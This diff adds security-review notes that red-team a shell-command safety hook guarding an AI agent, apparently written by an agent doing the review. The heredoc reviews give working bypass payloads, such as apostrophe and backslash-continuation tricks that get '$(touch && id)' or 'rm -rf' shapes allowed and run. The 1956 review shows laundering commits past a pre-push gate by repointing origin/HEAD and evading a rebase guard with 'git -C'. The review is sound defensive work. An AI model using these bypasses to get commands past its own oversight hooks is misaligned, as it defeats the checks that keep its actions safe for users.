+only via the pre-existing Finding-2 `/)` boundary, not via heredoc confusion). Not the #1958 wall;
+noted as a defense-in-depth gap, not a veto. `impact: unproven` (no heredoc-specific escalation).
+
+### `.strip()` / `BODY_CAT_MARKER \s` Unicode breadth on SAFE paths
+Latent (see enumeration table). Re-gated by `shell_tokens`+`is_allowed_gh`; no executable case
+landed. `reason: impact never reproduced` — kept here, not demoted.
+
+---
+
+## Security checklist
+- [x] Input validation at boundary present (heredoc parser + `bash -n`)…
+- [ ] …but the parser's **quote/comment model disagrees with bash for unquoted heredoc bodies**
+  (Finding R3). **FAIL.**
+- [x] No secrets in code or logs · [x] auth N/A · [x] no injection introduced · [x] no deps added
+
+## Attack surface swept clean this round (no ALLOWED+executed)
+String-op enumeration (all bash-faithful, above); even-`'` and `"…"` body cases (caught at 20);
+quoted-delimiter literal bodies (correctly inert); `$HOME`-only expansion (no command sub);
+`<<-`+tabs and `$'\t'` legit forms; realistic gh-writer/body-cat writers; A2/A3/A4 (per-line),
+R1 (ANSI-C), WS1/WS4/WS5 (blank-set) all re-run → BLOCKED. **Only the unquoted-heredoc-body
+odd-`'`/`#` desync (R3) produced ALLOWED + executed.**
+
+## Recommendations
+- **CRITICAL / VETO** — do not merge as "RCE fixed." R3 ships a live RCE in the same class via the
+  most common heredoc shape (unquoted `cat <<EOF` + apostrophe/`#`). Make the shared model
+  heredoc-body-aware (fix direction above).
+- **WARNING** — predecessor Finding 2 (content guards miss `$(…)` at the `/)` boundary / in double
+  quotes) remains the reason R3 is CRITICAL rather than defence-in-depth-contained; keep that
+  follow-up ticket.
+- **SUGGESTION** — separately, `has_active_command_substitution` ignores process substitution
+  `<(…)`/`>(…)`; harmless for the wall (independently allowed) but worth a defence-in-depth note.
+- The per-line-reset (Finding 1), ANSI-C (R1), and blank-set (R2) fixes are sound and should be
+  retained; R3 is an additional, independent, pre-existing hole in the same wall — the string-op
+  fixes closed the byte-classification desyncs but not the heredoc-body-semantics desync.
+
+### Reproducers (under `/tmp/hd1958rv3/`)
+| id | file | parser (old→new) | hook | bash_exec | class |
+|----|------|------------------|------|-----------|-------|
+| UQ_sq_inline | hunt2/mech | 10 → 10 | **ALLOWED(0)** | **True** | **VETO — RCE live (odd `'` prose)** |
+| UQ_squote | hunt2 | 10 → 10 | **ALLOWED(0)** | **True** | VETO (lone `'`) |
+| UQ_hash_line/after | hunt3 | 10 → 10 | **ALLOWED(0)** | **True** | VETO (`#` body) |
+| WEAP_prose_curl | mech | — → 10 | **ALLOWED(0)** | **True** | VETO (`$(… && id)` arbitrary exec) |
+| WEAP_rm | mech | — → 10 | ALLOWED(0) | (not run) | destructive shape guard-blind (Finding 2) |
+| UQ_plain / UQ_two_sq / UQ_dq_pair | hunt2/3 | 20 → 20 | BLOCKED | — | wall intent confirmed / controls |
+| Q_prose / UQ_var / OB_* | hunt3/overblock | — → 0/10 | ALLOWED | False | legit preserved ✓ |
+| A2/A3/A4 · R1a/R1e · WS1/WS4/WS5 | known | 20 → 20 | BLOCKED | — | Findings 1/R1/R2 fixed ✓ |

--- a/.lisa/security-reverify4-1958.md
+++ b/.lisa/security-reverify4-1958.md
@@ -1,0 +1,127 @@
+# Security RE-VERIFICATION round 4 — #1958 heredoc classifier (R3-fix attack + convergence)
+
+Re-verification at HEAD `271ba9399` (R3 unquoted-body fix) atop `eedc02aff` (R2),
+`a2fae713a` (R1 ANSI-C), `224ed78b9` (per-line reset). Predecessors:
+`.lisa/security-review-1958.md` (Finding 1), `-reverify-1958.md` (R1),
+`-reverify2-1958.md` (R2), `-reverify3-1958.md` (R3 VETO). Every payload assembled
+from bytes in Python (base64, never inline in Bash), driven JSON-on-stdin through the
+REAL fanned hook (`plugins/lisa/hooks/parity-safety-net.sh` → `parity-safety-net-heredoc.py`),
+and every executed case run under the same `/bin/bash` 3.2.57 the hook's `bash -n` gate
+uses, with `touch`/`id` sentinels. Harness `/tmp/hd1958rv4/` (`drive.py`, `gen1..4.py`,
+`mech.py`).
+
+## VERDICT: **VETO** — a FIFTH, distinct, executable desync is live (Finding R4).
+
+The R3 fix is real: the direct apostrophe/`#` reproducers (UQ_sq_inline `it's $(…)`,
+UQ_squote, UQ_hash_line, UQ_hash_after) and UQ_plain now all classify **20 → BLOCKED**,
+and legit forms (apostrophe prose, quoted-delimiter bodies, `<<-`+tabs, `$HOME`-only,
+legit trailing-backslash prose) stay ALLOWED — no over-block. **But R3's own new logic
+is defeated by a bash line-continuation the wall never joins.**
+
+`unquoted_heredoc_body_has_substitution` scans the body **after**
+`collapse_line_continuations` has run, and scans it **per body line**. Both assumptions
+are wrong for an unquoted heredoc body:
+
+1. `collapse_line_continuations` (L343) applies a **flat** shell quote state. Its
+   `state == "single"` branch (L354-357) **refuses to collapse a `\<newline>`**. But an
+   unquoted heredoc body performs NO quote processing — a body `'` is a literal byte, not
+   a string opener — while bash STILL removes `\<newline>` (bash manual: unquoted
+   here-doc, "the character sequence `\newline` is ignored"). So one apostrophe in the
+   body flips the collapser into phantom single-quote state and it leaves a
+   `$\<newline>(` split **un-joined**.
+2. `body_line_has_substitution` (L460) flags a bare backtick (single char) but requires
+   `$(` to be **two contiguous bytes** on one line. With the continuation left un-joined,
+   `$` sits at the end of body line N and `(` at the start of body line N+1, so the
+   per-line scan sees `'$\` (no `$(`) and `(touch…)` (no `$(`) — **neither triggers**.
+
+Net: `has_active_command_substitution` returns False (it too thinks it is inside an open
+single-quoted string), `unquoted_heredoc_body_has_substitution` returns False, parser
+falls to **UNSUPPORTED(10)**, hook **exits 0 (ALLOWED)** — and real bash joins the
+continuation and executes the `$(...)`.
+
+---
+
+## Security (proven)
+
+### FINDING R4 — CRITICAL (VETO): `\`-newline continuation splits `$(` past the unquoted-body scan
+
+`plugins/*/hooks/parity-safety-net-heredoc.py` — `collapse_line_continuations` L354-357
+(single-state short-circuit) + `body_line_has_substitution` L460-484 (per-line, contiguous
+`$(` only). Prevent by making the body scan **continuation-aware and heredoc-body-aware**
+(fix direction below).
+
+- **Reproducers** (end-to-end through the real hook; `bash -n` PASS → parser 10 →
+  hook ALLOWED(0) → bash created the sentinel). Bytes shown escaped; `⏎`=newline,
+  `\`=one backslash:
+
+  | id | payload (raw) | parser | hook | bash_exec |
+  |----|---------------|--------|------|-----------|
+  | A_contsplit_sq | `cat <<EOF⏎'$\⏎(touch SENT_A)⏎EOF⏎` | 10 | **ALLOWED(0)** | **True** |
+  | W_weaponized_id | `cat <<EOF⏎'$\⏎(touch SENT_W && id)⏎EOF⏎` | 10 | **ALLOWED(0)** | **True** (`id` ran) |
+  | P_realistic_prose | `cat <<EOF⏎notes: it's the rollout plan.⏎cleanup step $\⏎(touch SENT_P)⏎EOF⏎` | 10 | **ALLOWED(0)** | **True** |
+  | R_destructive_shape | `cat <<EOF⏎'$\⏎(rm -rf ~/…)⏎EOF⏎` | 10 | **ALLOWED(0)** | (not run) |
+
+  `mech.py` isolated introspection for W:
+  ```
+  after collapse_line_continuations: "cat <<EOF\n'$\\\n(touch SENT_A && id)\nEOF\n"   # \<newline> NOT joined
+  has_active_command_substitution : False
+  unquoted_heredoc_body_has_substitution : False
+  body lines seen by scan: "'$\\" -> sub? False ; '(touch SENT_A && id)' -> sub? False
+  bash stdout: 'uid=501(cody) gid=20(staff) …'      # id executed
+  SENT_A made: True
+  ```
+
+- **Controls that HELD (isolate the defect precisely):**
+  | id | payload | parser | hook | note |
+  |----|---------|--------|------|------|
+  | B_contsplit_nosq | `cat <<EOF⏎$\⏎(touch)⏎EOF` | 20 | BLOCKED | no `'` → collapse joins `$(` → caught (proves the `'` is the trigger) |
+  | Q_doublequote | `cat <<EOF⏎"$\⏎(touch)⏎EOF` | 20 | BLOCKED | `"` does NOT defeat collapse (joins in double-state) → isolates the bug to the **single-state** branch |
+  | C_contsplit_backtick | `cat <<EOF⏎'`\⏎touch…`⏎EOF` | 20 | BLOCKED | backtick is a 1-char trigger, immune to the split — only `$(` is split-hideable |
+
+- **Impact:** arbitrary `$(…)`/exfil (`$(curl…|sh)`, proven via `$(touch && id)`) executes
+  while the hook reports the command safe. The trigger is a single apostrophe anywhere
+  earlier in the body (ordinary English prose — `it's`) plus a `$` at end-of-line followed
+  by `(` on the next line — a plausible line-wrapped `cat <<EOF` file-write. Same RCE class
+  the PR claims to wall off; destructive `rm -rf` in this position is also guard-blind
+  (R_destructive_shape ALLOWED).
+
+- **reason:** reproducer (bash executed `id` + the sentinel end-to-end through the real
+  hook; B/Q/C controls prove parity elsewhere and pin the root cause to the single-state
+  branch) + bounded impact (arbitrary substitution in any unquoted heredoc body via
+  apostrophe + `\`-newline-split `$(`).
+
+**Fix direction (not applied):** the body scan must not depend on
+`collapse_line_continuations` (whose flat single-quote state is wrong for a body). In
+`unquoted_heredoc_body_has_substitution`, walk the body window on the **raw** lines and,
+before applying `body_line_has_substitution`, **join any body line ending in an unescaped
+`\` with the next line** (bash's unquoted-here-doc `\newline` removal) — equivalently, feed
+the whole body window as one continuation-collapsed string to a body-semantics scanner that
+honours only backslash-escaping and flags `$(`/backtick. Verify OB_trailbs (legit trailing
+`\` prose, no `$(`) stays ALLOWED under the fix, and add A/W/P/T as RED fixtures with
+B/Q/C as the isolating controls. This is the same "model diverges from bash inside an
+unquoted heredoc body" root as R3 — the R3 scan closed the quote/comment desync but not the
+line-continuation desync feeding it.
+
+---
+
+## Convergence sweep (prior findings) — all HELD
+
+- Findings 1 / R1 / R2 / **R3**: UQ_sq_inline, UQ_squote, UQ_hash_line, UQ_hash_after,
+  UQ_plain all → **20 / BLOCKED** (R3 fix confirmed effective for the direct forms).
+- Over-block controls all → **ALLOWED**: apostrophe prose (OB_prose), quoted-delimiter
+  literal body with `$(` (OB_quoted), `<<-`+tabs (OB_tabdash), legit trailing-backslash
+  prose (OB_trailbs), `$HOME`-only expansion (OB_var). No false positive.
+- Multiple heredocs: `len(markers) > 1` → MALFORMED (L710); a second unquoted heredoc
+  carrying the payload is BLOCKED by that rule, not a bypass.
+- `${…:-$(cmd)}` / `$((…))` forms: contain a contiguous `$(`, so
+  `body_line_has_substitution` flags them (unless split by the R4 continuation trick, which
+  is the finding). Backtick is 1-char and split-immune (C control).
+
+## Recommendations
+- **CRITICAL / VETO** — do not merge as "RCE fixed". R4 ships a live RCE in the same class
+  via `apostrophe + \`-newline-split `$(``. Make the body scan continuation-aware (fix
+  direction above); keep the sound per-line/ANSI-C/blank-set/R3 fixes.
+- **WARNING** — predecessor Finding 2 (content guards miss `$(…)` at the `/)` boundary /
+  in double quotes) remains why R4 is CRITICAL rather than defence-in-depth-contained.
+</content>
+</invoke>

--- a/.lisa/security-reverify5-1958.md
+++ b/.lisa/security-reverify5-1958.md
@@ -1,0 +1,168 @@
+# Security RE-VERIFICATION round 5 (FINAL) — #1958 heredoc classifier
+
+Re-verification at HEAD `dcb271a75` (R4 `collapse_body_continuations`) atop `271ba9399`
+(R3), `eedc02aff` (R2), `a2fae713a` (R1 ANSI-C), `224ed78b9` (per-line reset).
+Predecessors: `.lisa/security-review-1958.md` (Finding 1), `-reverify-1958.md` (R1),
+`-reverify2-1958.md` (R2), `-reverify3-1958.md` (R3), `-reverify4-1958.md` (R4). No code
+changes this round. Every payload built from bytes in Python (`@SENT@` sentinel token
+substituted at exec time; never inline in a Bash string), driven JSON-on-stdin through the
+REAL fanned hook (`plugins/lisa/hooks/parity-safety-net.sh` → `parity-safety-net-heredoc.py`)
+and executed under the same `/bin/bash` 3.2.57 the hook's `bash -n` gate uses, with
+`touch`/`id` sentinels. Harness `/tmp/hd1958rv5/` (`harness.py`).
+
+## VERDICT: **VETO** — two distinct, executable, ALLOWED+EXECUTED bypasses survive all five fixes.
+
+The five landed fixes are each sound *for the shape they targeted* — every prior reproducer
+(Finding-1 A2, R1, R2, R3 apostrophe/`#`, R4 `$\`-newline-split) now classifies **20 →
+BLOCKED**, and every legit form (quoted-delimiter literal body, apostrophe prose, trailing-`\`
+prose, `$HOME`-only, `<<-`+tabs) stays **ALLOWED with no execution** (no over-block). **But
+R4's own new logic rests on a false invariant about bash, and R3's body scanner never
+neutralised the flat scanner — so two live RCEs in the exact class the PR claims to wall off
+remain.**
+
+Both were proven end-to-end: `bash -n` PASS → parser **10 (UNSUPPORTED)** → hook **exit 0
+(ALLOWED)** → real bash **created the sentinel**.
+
+---
+
+## Security (proven)
+
+### FINDING R5a — CRITICAL (VETO): trailing `\` on the last body line swallows the terminator, pushing `$(…)` past R4's body window
+
+`plugins/*/hooks/parity-safety-net-heredoc.py` — `unquoted_heredoc_body_has_substitution`
+(L549-575) extracts the body window by matching the delimiter **per physical line**
+(`candidate == marker.delimiter`, L561) and its comment (L564-571) asserts *"the terminator
+was matched per physical line above (bash matches the delimiter before continuation
+processing), so continuations are joined only WITHIN the body window, never across the
+delimiter."* **That invariant is false.** A `\<newline>` at the end of the last body line is a
+bash line-continuation that **consumes the delimiter line into the body**, extending bash's
+real here-doc past the terminator the parser stops at.
+
+- **Empirical proof of the bash semantics** (no parser involved):
+  `cat <<EOF⏎foo\⏎EOF⏎bar⏎` under `/bin/bash` prints `fooEOF\nbar\n` — the `\<newline>`
+  joined `foo`+`EOF` and `bar` was swallowed as body too. Bash does continuation processing
+  that eats the delimiter; the parser's "per physical line" match does not.
+
+- **Reproducers** (raw bytes; `⏎`=newline, `\`=one backslash; all end-to-end through the real hook):
+
+  | id | payload (raw) | parser | hook | bash_exec |
+  |----|---------------|--------|------|-----------|
+  | R5a (X1) | `cat <<EOF⏎'foo\⏎EOF⏎$(touch @SENT@)⏎` | **10** | **ALLOWED(0)** | **True** |
+  | R5a-id (X1w) | `cat <<EOF⏎'foo\⏎EOF⏎$(id > @SENT@)⏎` | **10** | **ALLOWED(0)** | **True** (`id` ran, output captured) |
+  | R5a-bt (X3) | `cat <<EOF⏎'foo\⏎EOF⏎` `` `touch @SENT@` `` `⏎` | **10** | **ALLOWED(0)** | **True** |
+  | R5a-rm (X4) | `cat <<EOF⏎'foo\⏎EOF⏎$(rm -rf @SENT@)⏎` | **10** | **ALLOWED(0)** | (not run — guard-blind at `/)` boundary) |
+
+- **Mechanism (three desyncs stack):** the apostrophe `'foo` (an *odd* single quote in the
+  unquoted body) (1) flips the FLAT `collapse_line_continuations` into phantom single-quote
+  state, so it **refuses to remove** the `\<newline>` — leaving `'foo\` and `EOF` as separate
+  lines in `logical_command`; (2) flips the FLAT `has_active_command_substitution` into the
+  same phantom single-quote state, so it goes **blind** to the trailing `$(touch)`; (3) R4's
+  body-window extraction matches the physical `EOF` line and stops, so the `$(touch)` sits
+  *after* the window and the body scanner never scans it. `marker_is_closed` finds the physical
+  `EOF` and reports "closed". Parser → UNSUPPORTED(10) → hook ALLOWED. Bash, ignoring the
+  apostrophe, honours the `\<newline>`, swallows `EOF`, and runs `$(touch)` inside the extended
+  body.
+
+- **Isolating controls (HELD — pin the root cause):**
+  | id | payload | parser | hook | note |
+  |----|---------|--------|------|------|
+  | C1 (no apostrophe) | `cat <<EOF⏎foo\⏎EOF⏎$(touch)⏎` | 20 | BLOCKED | flat collapse removes the continuation → marker unterminated → MALFORMED. Proves the apostrophe is the trigger. |
+  | C3 (balanced apostrophes) | `cat <<EOF⏎'foo'\⏎EOF⏎$(touch)⏎` | 20 | BLOCKED | even `'` count → flat scanner not blinded → caught. |
+
+- **reason:** reproducer (bash created the sentinel and ran `id` end-to-end through the real
+  hook; C1/C3 controls prove parity elsewhere and pin the trigger to the odd-apostrophe +
+  trailing-`\` combination) + bounded impact (arbitrary `$(…)`/backtick execution in the
+  swallowed region). Directly falsifies R4's stated invariant — this is R4's own new logic.
+
+### FINDING R5b — CRITICAL (VETO): an odd apostrophe in an unquoted body poisons the flat scanner *past* the terminator, hiding a command-proper `$(…)`
+
+`plugins/*/hooks/parity-safety-net-heredoc.py` — `has_active_command_substitution` (L416-457)
+runs one FLAT single/double-quote state machine over the whole `logical_command`, including
+the unquoted here-doc body. R3 added a *separate* body-window scanner
+(`unquoted_heredoc_body_has_substitution`) but **never stopped the flat scanner from
+mis-reading the body**: an odd apostrophe in the body opens a phantom single-quote that
+persists **after the here-doc terminator**, blinding the flat scan to a `$(…)` on the ordinary
+command line that follows. `strip_provably_literal_body` only removes *quoted*-delimiter
+bodies, so an unquoted body's apostrophe is never neutralised. **No trailing backslash
+needed.**
+
+- **Reproducers:**
+  | id | payload (raw) | parser | hook | bash_exec |
+  |----|---------------|--------|------|-----------|
+  | R5b (C2min) | `cat <<EOF⏎'⏎EOF⏎$(touch @SENT@)⏎` | **10** | **ALLOWED(0)** | **True** |
+  | R5b-real (C2chain) | `cat <<EOF⏎it's fine⏎EOF⏎echo $(touch @SENT@)⏎` | **10** | **ALLOWED(0)** | **True** |
+  | R5b-full (C2) | `cat <<EOF⏎'foo⏎EOF⏎$(touch @SENT@)⏎` | **10** | **ALLOWED(0)** | **True** |
+
+- **Mechanism:** bash terminates the here-doc normally at `EOF`, then runs the next line
+  `$(touch …)` / `echo $(touch …)` as a real command substitution. The parser's flat scanner,
+  still inside the body's phantom single-quote, never sees the `$(`; the body-window scanner
+  only scans lines *before* `EOF`, so it never sees it either. Parser → 10 → ALLOWED.
+
+- **Control (HELD):** `C2dq` = double-quote body `cat <<EOF⏎"foo⏎EOF⏎$(touch)⏎` → **20 /
+  BLOCKED**: the flat scanner's *double*-quote branch detects `$(`, so only the single-quote
+  (apostrophe) branch is exploitable. Isolates the defect to single-quote-state leakage.
+
+- **reason:** reproducer (sentinel created end-to-end through the real hook; `C2dq` control
+  proves the double-quote path is safe and pins the defect to apostrophe leakage) + bounded
+  impact (arbitrary `$(…)` on the post-here-doc command line, triggered by a single apostrophe
+  — ordinary English prose `it's` — inside a `cat <<EOF` file-write). Same "flat model diverges
+  from bash inside an unquoted body" root as R3, on the region R3's body scanner did not cover.
+
+- **Realism:** `R5b-real` is a completely ordinary agent shape — write a note containing an
+  apostrophe with `cat <<EOF … EOF`, then run one more command that legitimately uses `$(…)`.
+  The apostrophe in the first command silently disarms the wall for the second.
+
+---
+
+## Convergence sweep — targeted fixes all HELD (BLOCKED), no over-block
+
+| id | payload | parser | hook | class |
+|----|---------|--------|------|-------|
+| Finding-1 A2 | `echo "⏎cat <<'EOF'⏎$(touch)⏎EOF⏎"` | 20 | BLOCKED | ✓ fixed |
+| R3 apostrophe-inline | `cat <<EOF⏎it's $(touch)⏎EOF` | 20 | BLOCKED | ✓ fixed |
+| R3 `#` | `cat <<EOF⏎# $(touch)⏎EOF` | 20 | BLOCKED | ✓ fixed |
+| R4 `$\`-split | `cat <<EOF⏎'$\⏎(touch)⏎EOF` | 20 | BLOCKED | ✓ fixed |
+| R4 weaponized | `cat <<EOF⏎'$\⏎(touch && id)⏎EOF` | 20 | BLOCKED | ✓ fixed |
+| OB quoted-literal | `cat <<'EOF'⏎it's $(x) `y`⏎EOF` | 10 | ALLOWED (no exec) | ✓ legit preserved |
+| OB apostrophe-prose | `cat <<EOF⏎notes: it's the plan.⏎EOF` | 10 | ALLOWED (no exec) | ✓ |
+| OB trailing-`\` prose | `cat <<EOF⏎…wraps \⏎onto next.⏎EOF` | 10 | ALLOWED (no exec) | ✓ |
+| OB `$HOME`-only | `cat <<EOF⏎home is $HOME⏎EOF` | 10 | ALLOWED (no exec) | ✓ |
+| OB `<<-`+tabs | `cat <<-EOF⏎⇥body⏎⇥EOF` | 10 | ALLOWED (no exec) | ✓ |
+
+Token × context matrix (unquoted body / quoted-delim body / command-proper / double-quoted /
+ANSI-C-adjacent) confirmed: `$(`, `` ` ``, `${`/`$((`/`$[` are each either detected (BLOCKED) or
+genuinely inert in bash — **except** the two apostrophe-leak seams above, where a
+command-substitution token that bash executes is missed. `$[` / `${`/`$((` forms all contain a
+contiguous `$(`-adjacent token caught by the flat/body scans unless routed through R5a/R5b.
+
+---
+
+## Recommendations
+
+- **CRITICAL / VETO** — do not merge as "RCE fixed". Ship the five sound fixes (Finding-1, R1,
+  R2, R3, R4-direct) and file **R5a + R5b** as a single tracked known-limitation: *the flat
+  quote-state scanner mis-reads apostrophes inside an unquoted here-doc body, and the body
+  window is matched per-physical-line while bash's `\<newline>` continuation swallows the
+  terminator.*
+- **Fix direction (self-contained, not applied):** make the flat scan here-doc-body-aware
+  instead of bolting a second scanner beside it. Before running `has_active_command_substitution`,
+  for every unquoted top-level closed marker: (1) compute the body window using bash's real
+  continuation semantics — join `\<newline>` first, THEN match the delimiter, so a swallowed
+  terminator extends the window (fixes R5a); (2) replace that body window with a
+  quote/comment-neutralised copy — apostrophes, double-quotes and `#` mapped to inert bytes,
+  `$(`/`` ` ``/`$((` preserved — so the flat scan neither leaks quote state past the terminator
+  (fixes R5b) nor misses an in-body substitution. Equivalently: one cross-line state machine
+  that knows "inside an unquoted here-doc body, quotes/comments are literal but expansion is
+  live," shared by window-extraction and substitution detection. Add R5a (X1/X1w/X3) and R5b
+  (C2min/C2chain) as RED fixtures; keep C1/C3/C2dq as the isolating controls.
+- **WARNING (non-blocking, pre-existing)** — content guards miss `$(rm …)` at the `/)` boundary
+  (predecessor Finding 2) — the reason R5a-rm is guard-blind and both findings are CRITICAL
+  rather than defence-in-depth-contained. Keep that follow-up.
+- **SUGGESTION (non-blocking)** — process substitution `<(…)`/`>(…)` still undetected
+  (independently allowed; not a here-doc-wall escalation) and content-guard `#1982` remain
+  defence-in-depth items.
+
+## Reproducers (under `/tmp/hd1958rv5/`, harness `harness.py`)
+All R5a/R5b rows: `bash -n` PASS → parser 10 → hook ALLOWED(0) → sentinel created (True).
+C1/C3/C2dq/R3/R4/Finding-1: parser 20 → hook BLOCKED(2). OB rows: parser 10/ hook ALLOWED /
+no exec.

--- a/.lisa/security-review-1956.md
+++ b/.lisa/security-review-1956.md
@@ -1,0 +1,82 @@
+# Security Review — work-item-sync-lanes (CodySwannGT/lisa#1956), task T3
+
+Commits reviewed: `bdedff6e4` (Fix 1 rebase-aware gate + Fix 5 push-range exclusion),
+`15d5ee8fb` (Fix 4 conditional rebase --abort/--quit guard), `5192d489d` (skill docs).
+Environment: git 2.53.0. All claims tested empirically in scratch repos under
+`/tmp/sec1956/` and against the real hook / test suites — no code changed.
+
+## Verdict per surface
+
+| Surface | Verdict | Added laundering/bypass lane? |
+|---------|---------|-------------------------------|
+| Fix 1 — rebase-aware detached-HEAD gate | **PASS** | No net-new capability |
+| Fix 5 — push-range default-branch exclusion | **PASS w/ noted local weakening** | Local pre-push bypass (existing-branch path); CI backstop recomputes |
+| Fix 4 — conditional abort/--quit guard | **PASS** | No; two accepted residuals (safety, not security) |
+| Regression floor (negative controls) | **PASS** | 211/211 tests green; closed/mixed/missing still rejected |
+
+**No must-fix security findings.** Every observation below is accepted-baseline relative
+to the standing threat model: the whole validator runs client-side, `.git/lisa/work-item.json`
+and all local refs are agent-writable, and the server-side authority is CI `validate-pr`
+(raw `git rev-list base..head`, no exclusion, no symref). The changes do not open a *new*
+laundering lane that clears that server-side authority.
+
+## Security Analysis
+
+### Threat Model (STRIDE)
+| Threat | Applies? | Description | Mitigation |
+|--------|----------|-------------|------------|
+| Spoofing | Partial | Fabricated rebase `head-name` / repointed remote-tracking symref makes local state lie about branch/default | Trailer + live-issue checks are independent; CI `validate-pr` recomputes server-side |
+| Tampering | Yes | Agent tampers with local `.git` files (head-name, `refs/remotes/*`, `refs/remotes/origin/HEAD`) to influence validation scope | These are already agent-writable; CI is the authority |
+| Repudiation | Yes | Work-item traceability could be weakened if a branch-authored commit is laundered past the pre-push gate | CI `validate-pr` re-links every commit to an open work item |
+| Info Disclosure | No | No secrets, no new outputs, no network reads added (Fix 5 is offline-only) | — |
+| Denial of Service | No | Guards fail closed; no unbounded loops/inputs added | — |
+| Elevation of Privilege | Partial | Bypassing the pre-push enforcement gate is a privilege-ish escalation of what an agent may push locally | Local hook was never a hard boundary; CI is |
+
+### Security Checklist
+- [x] Input validation at system boundaries — refs validated (`startsWith refs/remotes/<remote>/` + `rev-parse --verify`); detached-no-rebase fails closed
+- [x] No secrets in code or logs — none touched
+- [x] Auth/authz enforced on new endpoints — n/a (git hook)
+- [x] No SQL/NoSQL injection vectors — n/a
+- [x] No XSS vectors — n/a
+- [x] Dependencies free of known CVEs — no dependency change
+- [x] `.gitleaksignore` — not affected
+
+---
+
+### Security (proven)
+
+**F1 — Fix 5: repointing `refs/remotes/origin/HEAD` launders branch-authored commits past the LOCAL pre-push gate (existing-branch path).** — `remoteDefaultRef()` / `parsePushLines()` in `all/copy-overwrite/scripts/lisa-work-item.mjs:924-960`; prevent by treating CI `validate-pr` as the enforced authority and/or documenting the residual.
+  - reproducer: `/tmp/sec1956/fix5_symref.sh` — after `git update-ref refs/remotes/origin/attacker <feature-tip>` + `git symbolic-ref refs/remotes/origin/HEAD refs/remotes/origin/attacker`, the guard's own checks (`startsWith('refs/remotes/origin/')` ✓, `rev-parse --verify` ✓) accept the attacker ref, and `git rev-list <remoteMain>..<feature> --not refs/remotes/origin/attacker` returns **empty** → the branch-authored, trailer-less commit is exempted. Observed: baseline range = 1 commit; post-repoint range = `<EMPTY - LAUNDERED>`.
+  - impact: an agent with local repo control (which it always has) can exempt branch-authored commits (missing / mixed / closed-issue Work-Item trailer) from the **pre-push** `validate-push` gate on the existing-branch push path. Neither `git update-ref` nor `git symbolic-ref` is blocked by the safety net. Bounded to the local hook: **CI `validate-pr` recomputes `git rev-list base..head` with no exclusion and no symref** (`lisa-work-item.mjs:1093`), so the launder does not survive a repo that enforces `validate-pr` as a required check.
+  - reason: reproducer + bounded impact both present.
+  - **classification: accepted-baseline (local-only), with one caveat.** This is a *net-new* local weakening: pre-fix, the existing-branch path used a bare `${remoteOid}..${localOid}` range (strict — no ref-based exclusion), so ref tampering could not launder it. Post-fix it excludes an agent-repointable "default." It is comparable in magnitude to the **pre-existing** new-branch path (`--not --remotes=<remote>`, unchanged at line 955/960), which already trusts every agent-writable remote-tracking ref. The fix's stated rationale ("only the remote DEFAULT branch is ever excluded — never `--remotes`") holds against a *naive* pusher but is partially undermined because "default" is the locally-repointable `refs/remotes/origin/HEAD` symref. **Caveat for this repo:** the Lisa repo itself wires only the pre-push `validate-push` (lefthook) — it does not run `validate-pr` in its own CI (grep found no `.github/workflows` caller) — so for the Lisa repo the server-side backstop is not currently active; downstream templates get the CI gate. Impact even then is bounded to work-item *traceability* integrity (wrong/closed issue attribution), not code execution, secrets, or injection.
+
+**F2 — Fix 4: `git -C <other-repo> rebase --abort` from an unrelated cwd evades the conflict-resolution guard.** — guard 3b in `plugins/*/hooks/parity-safety-net.sh`; same documented residual as reset guard 3.
+  - reproducer: `/tmp/sec1956/fix4_probe.sh` case B — resolved+staged rebase in `repoB`; hook cwd = unrelated clean `elsewhere`; command `git -C <repoB> rebase --abort`. The regex matches (command recognized) but the discriminator probes (`git rev-parse --git-path rebase-apply`, `git diff AUTO_MERGE`) run in the **hook cwd**, which has no rebase → **exit 0 (ALLOWED)**, while the abort would discard `repoB`'s human resolutions. Control case A (cwd = repo) correctly returns exit 2 (BLOCK).
+  - impact: an agent whose shell cwd is outside the rebase repo can discard human/agent conflict resolutions in another repo via `-C`. Bounded: requires cwd already elsewhere (the in-repo `cd /tmp && git -C repo ...` form is still caught because the hook runs pre-`cd` with cwd = repo). It is a **safety** loss (work discard), not a validation/laundering bypass.
+  - reason: reproducer + bounded impact both present.
+  - **classification: accepted-baseline.** Explicitly documented in the guard comment and commit message as the same residual carried by guard 3 (reset): "the probes run in the hook's cwd at hook time." Parity, not regression.
+
+**F3 — Fix 4: multi-pick rebase — abort is ALLOWED even when it discards an EARLIER pick's already-committed human resolution (under-block).** — guard 3b discriminator only inspects the CURRENT stopped pick.
+  - reproducer: `/tmp/sec1956/fix4_probe.sh` case C — resolve pick-1 conflict → `git rebase --continue` (commits the resolution) → rebase stops on pick-2 with an **untouched** conflict. Guard verdict on `git rebase --abort` = **exit 0 (ALLOWED)** because the discriminator sees pick-2's untouched state (worktree matches AUTO_MERGE, unmerged entries present). Aborting restores pre-rebase `feature`, discarding pick-1's committed `human-resolved-a`.
+  - impact: human conflict-resolution work already committed earlier in the same rebase can be silently discarded by an allowed `--abort`. Bounded: only work created during this rebase (nothing that pre-existed the rebase is lost — abort restores ORIG_HEAD by design); standard git semantics; the agent explicitly typed `--abort`.
+  - reason: reproducer + bounded impact both present.
+  - **classification: accepted-baseline (safety limitation, not security).** The guard's contract is best-effort protection of the *current* resolution; it does not (and structurally cannot cheaply) track resolutions folded into already-completed picks. Not a laundering/bypass lane. Worth a note to the quality specialist as a discriminator-completeness limitation.
+
+**F4 — Fix 1: `.git/rebase-merge/head-name` is a fabricable plain file, so a detached HEAD with no real rebase can pass `assertStateBranch`.** — `rebaseBranch()` at `lisa-work-item.mjs:82-98`.
+  - reproducer: `/tmp/sec1956/fix1_headname.sh` — writing `refs/heads/feature` into the `--git-path rebase-merge/head-name` file (no real rebase in progress; `git status` shows `## HEAD (no branch)`) makes `rebaseBranch()` return `feature`. Detached-HEAD-with-no-rebase correctly returns empty → still throws (case 1). Path resolution is worktree-correct: in a linked worktree `--git-path` resolves to `.git/worktrees/<wt>/rebase-merge/head-name` (case 3).
+  - impact: **none beyond pre-existing local control.** `assertStateBranch` is a client-side *consistency* check between two already-agent-writable pieces of local state (the binding file `state.branch` and the branch/head-name). To pass, the fabricated head-name must equal `state.branch`, which the agent can already set. The independent gates — the Work-Item trailer (`exactWorkItem`), the live open-issue check (`validateLive`), `assertStateMatches`, and CI `validate-pr` — are unchanged. Fix 1 correctly (a) still fails closed for detached-no-rebase and (b) resolves the state dir per-worktree.
+  - reason: reproducer + bounded impact both present.
+  - **classification: accepted-baseline (no added risk).** The fix relaxes a consistency check, not a security boundary; it grants no laundering capability the agent lacked.
+
+### Security (unproven)
